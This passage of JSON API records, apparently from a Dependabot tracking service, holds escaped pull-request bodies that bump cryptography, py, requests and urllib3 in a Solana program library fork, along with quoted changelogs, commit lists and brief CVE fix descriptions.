2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.19...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Emadalshamery/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Emadalshamery/solana-program-library/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Emadalshamery%2Fsolana-program-library/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2603096932","node_id":"PR_kwDON5k8AM6bKBtk","number":16,"state":"open","title":"build(deps): bump the pip group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-18T22:51:29.000Z","updated_at":"2025-06-18T22:51:30.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":4,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.19","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 4 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py), [requests](https://github.com/psf/requests) and [urllib3](https://github.com/urllib3/urllib3).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.19 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca 